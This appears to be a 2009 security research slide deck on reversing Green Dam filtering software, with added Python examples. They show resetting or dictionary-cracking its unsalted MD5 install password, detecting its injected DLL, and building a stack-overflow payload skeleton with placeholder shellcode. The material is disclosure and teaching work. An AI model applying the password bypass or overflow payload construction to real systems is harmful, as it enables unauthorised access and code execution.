1. Reversing and Exploiting Green Dam
[0xdf]
Valkyrie-X Security Research Lab
VXRL 2009
2. Special Thank You
• Mr. Byoungyoung Lee from PLUS, who is the mentor/advisor of Valkyrie-X
3. Background
• Focus on research and studies on software/system exploitation, vulnerability research and reverse engineering, penetration testing and crypto problems.
• Activity: we joined CTF and ranked 68th out of 230 teams in the DefCon 17 Prequalifying Round.
7. Reversing
• XNet2.exe
– It is the main Green Dam service.
– It handles installation and registers the software key with the system.
– It is responsible for the password check and reset.
– It commands XDaemon.exe and gn.exe.
– It kick-starts a number of processes from the following executables:
• Xdaemon, gn, HTAnalyzer, MPSVCC, HNCENG, HH, Looklog and LookPic
13. Installation Password
• Green Dam hashes the installation password with MD5 and saves the digest as plain text in the file kwpwf.dll in the C:\WINDOWS\system32 directory. If the file is opened in Notepad, its content replaced with "D0970714757783E6CF17????????????????????" and saved, the password is reset to the original "1122??????". Anyone who can write that file can therefore reset the password, and because the digest is unsalted it can also be looked up in an MD5 table.
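The two attacks the slide implies, as an added example that is not Green Dam's own code: overwriting the stored hash with the hash of a known password (the Notepad trick) and recovering the password by dictionary lookup. The on-disk format is an assumption inferred from the slide's example (one line holding the MD5 digest as uppercase hex); the file path is a temporary file standing in for kwpwf.dll, and the password "password" is made up.

```python
"""Added example (not Green Dam's own code): why an unsalted MD5 hash stored
as plain text in a user-writable file protects nothing.
Assumed storage format, inferred from the slide's example: one line holding
the MD5 digest of the password as 32 uppercase hex digits."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, Optional


def md5_hex_upper(password: str) -> str:
    """MD5 digest of the password as uppercase hex (the assumed on-disk form)."""
    return hashlib.md5(password.encode("utf-8")).hexdigest().upper()


def write_password_file(path: str, password: str) -> str:
    """Mimic the installer: write only the hash, in plain text. Returns the hex."""
    digest = md5_hex_upper(password)
    with open(path, "w", encoding="ascii") as fh:
        fh.write(digest)
    return digest


def read_password_file(path: str) -> str:
    with open(path, "r", encoding="ascii") as fh:
        return fh.read().strip().upper()


def reset_password(path: str, new_password: str) -> str:
    """The Notepad trick from the slide: anyone who can write the file
    replaces the stored hash with the hash of a password they know."""
    return write_password_file(path, new_password)


def crack_password_file(path: str, candidates: Iterable[str]) -> Optional[str]:
    """No salt and a fast hash: a plain dictionary lookup recovers the password."""
    stored = read_password_file(path)
    for candidate in candidates:
        if md5_hex_upper(candidate) == stored:
            return candidate
    return None


def demo() -> Dict[str, Optional[str]]:
    """Constructed scenario: a temp file stands in for
    C:\\WINDOWS\\system32\\kwpwf.dll and 'password' is a made-up install password."""
    fd, path = tempfile.mkstemp(suffix=".dll")
    os.close(fd)
    try:
        original = write_password_file(path, "password")
        cracked = crack_password_file(path, ["123456", "letmein", "password"])
        replaced = reset_password(path, "attacker-chosen")
        after_reset = crack_password_file(path, ["password", "attacker-chosen"])
    finally:
        os.remove(path)
    return {"original": original, "cracked": cracked,
            "replaced": replaced, "after_reset": after_reset}


if __name__ == "__main__":
    print(demo())
```

The dictionary here is three words; a real wordlist or an online MD5 lookup table does the same job, which is why the Tools slide lists an MD5 lookup site.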
15. Green Dam – Data File
• Decrypted file content
– Contains the keywords used for filtering.
• The data file naming convention and filtering classification are exactly the same as those of Cybersitter from Solid Oak.
22. Green Dam – Monitored Software
• Monitored software
– The list of monitored software can be found in injlib32.dll.
– Injlib32.dll is injected into every critical process.
– Handle.dll creates a process/thread to monitor any messages received from the injected DLL (it supports transmitstring).
[Figure: Handler.dll, Injlib32.dll, Notepad.exe]
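A check a practitioner would want after reading this slide is which processes on a host actually carry the injected DLL. The following is an added example, not part of the deck: it parses a constructed listing in the layout `tasklist /m` prints on Windows (assumed format: image name, PID, then a comma-separated module list that may wrap onto indented lines) and flags the processes whose module list contains injlib32.dll. The process names, PIDs and module lists in the sample are made up.

```python
"""Added example, not part of the deck: flag which processes carry the
injected injlib32.dll. The input is a constructed sample in the layout
`tasklist /m` prints on Windows (assumed: image name, PID, then a
comma-separated module list that may wrap onto indented lines)."""
import re
from typing import Dict, List

INJECTED_DLL = "injlib32.dll"

# Constructed sample output; not captured from a real Green Dam host.
SAMPLE_TASKLIST = """\
Image Name                     PID Modules
========================= ======== ============================================
System                           4 N/A
notepad.exe                   1234 ntdll.dll, kernel32.dll, injlib32.dll,
                                   user32.dll
iexplore.exe                  2048 ntdll.dll, INJLIB32.DLL, mshtml.dll
XNet2.exe                      777 ntdll.dll, kernel32.dll
cmd.exe                        999 ntdll.dll, kernel32.dll
"""

_ROW = re.compile(r"^(\S.*?)\s+(\d+)\s+(.*)$")


def _modules(field: str) -> List[str]:
    """Split a module field, dropping blanks and the 'N/A' placeholder."""
    return [m.strip().lower() for m in field.split(",")
            if m.strip() and m.strip() != "N/A"]


def parse_tasklist_modules(text: str) -> Dict[str, List[str]]:
    """Map 'image(pid)' to its lowercased module list; indented lines are
    continuations of the previous process's module list."""
    procs: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Image Name") or line.startswith("="):
            continue
        if line[0].isspace():
            if current is not None:
                procs[current].extend(_modules(line))
            continue
        match = _ROW.match(line)
        if not match:
            continue
        image, pid, modules = match.groups()
        current = f"{image}({pid})"
        procs[current] = _modules(modules)
    return procs


def injected_processes(procs: Dict[str, List[str]]) -> List[str]:
    """Processes whose module list contains the injected DLL (case-insensitive)."""
    return sorted(k for k, mods in procs.items() if INJECTED_DLL in mods)


def clean_processes(procs: Dict[str, List[str]]) -> List[str]:
    """Processes the injector left alone; compare against the list of
    monitored software the deck says lives in injlib32.dll."""
    return sorted(k for k, mods in procs.items() if INJECTED_DLL not in mods)


if __name__ == "__main__":
    table = parse_tasklist_modules(SAMPLE_TASKLIST)
    print("injected:", injected_processes(table))
    print("clean:   ", clean_processes(table))
```

Module names are compared case-insensitively because Windows reports them in whichever case the loader saw; the sample includes one uppercase entry for that reason.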
26. Green Dam – Exploitation
• Possible vulnerabilities in Green Dam version 3.1.7
– Green Dam is injected into the browser process and cannot handle a long URL.
– A stack buffer overflow is found.
• An exploit has been published on Milw0rm.com; it should be the same vulnerability.
28. What is a Stack Buffer Overflow?
(from Wikipedia.org)
29. How can we exploit?
• We submit an input of 2048 'A's as a URL.
• We attach OllyDbg to the Internet Explorer process (iexplore.exe) to debug it at runtime.
31. Exploitation Summary
• The stack is successfully overwritten with our input (2048 'A's).
• Deploying shellcode will be our next mission.
• No patch has been provided.
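The mechanics behind slides 29 and 31, as an added example that is neither the deck's code nor the Milw0rm exploit: the 2048-'A' probe, the cyclic pattern used to turn the EIP value seen in OllyDbg into an offset, and the payload layout for the "deploy shellcode" step. The host, the EIP value, the return address and the shellcode bytes are placeholders, not values taken from Green Dam.

```python
"""Added example; it is neither the deck's code nor the Milw0rm exploit.
It shows the mechanics behind slide 29's 2048-'A' probe and slide 31's
'deploy shellcode' follow-up. The host, the EIP value, the return address
and the shellcode bytes are placeholders, not values from Green Dam."""
import string
import struct
from typing import Optional

PLACEHOLDER_HOST = "http://example.com/"   # assumed; any URL the filter inspects


def crash_url(length: int = 2048, host: str = PLACEHOLDER_HOST) -> str:
    """The probe from the slide: a URL padded with `length` 'A's. If EIP reads
    0x41414141 in OllyDbg, the saved return address was overwritten."""
    return host + "A" * length


def pattern_create(length: int) -> str:
    """Cyclic, non-repeating pattern (Metasploit-style Upper/lower/digit triplets)
    so that whatever lands in EIP identifies its own offset in the input."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern: str, eip: int) -> Optional[int]:
    """Turn the EIP value read off the debugger back into the four bytes that
    sat on the stack (x86 is little-endian) and locate them in the pattern."""
    needle = struct.pack("<I", eip).decode("ascii", errors="replace")
    index = pattern.find(needle)
    return index if index >= 0 else None


def build_payload(offset: int, ret_addr: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """Layout for the next step: filler up to the saved return address, the
    address to land in EIP, a NOP sled, then the shellcode."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    probe = crash_url()                      # step 1: 2048 'A's
    pattern = pattern_create(2048)           # step 2: replace the 'A's with a pattern
    eip_seen = 0x41336141                    # placeholder for the EIP value in OllyDbg
    offset = pattern_offset(pattern, eip_seen)
    print(len(probe), offset)
    # step 3: INT3 (0xCC) stands in for real shellcode; ret_addr is a placeholder.
    print(build_payload(offset, 0xDEADBEEF, b"\xcc" * 4)[:40])
```

Because the input travels as a URL, bytes such as 0x00, 0x0A, 0x0D, spaces and anything the browser percent-encodes will not survive unchanged; the return address and shellcode chosen for the real payload have to avoid them, which the deck does not get to.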
33. Conclusion
• We strongly suggest not installing this software.
• It introduces vulnerabilities, and it does not just filter: it monitors the software you use and the content you type.
34. Thank you for listening
• Anthony Lai (0xdf)
• 0xdarkfloyd@gmail.com
36. Tools
• MD5 hash lookup ("MD5 Decryption")
– http://www.md5decrypter.com/
• IDA Pro (a free version is available)
– http://www.hex-rays.com/idapro/
– http://www.amazon.com/exec/obidos/ASIN/1593271786/datarescuesanv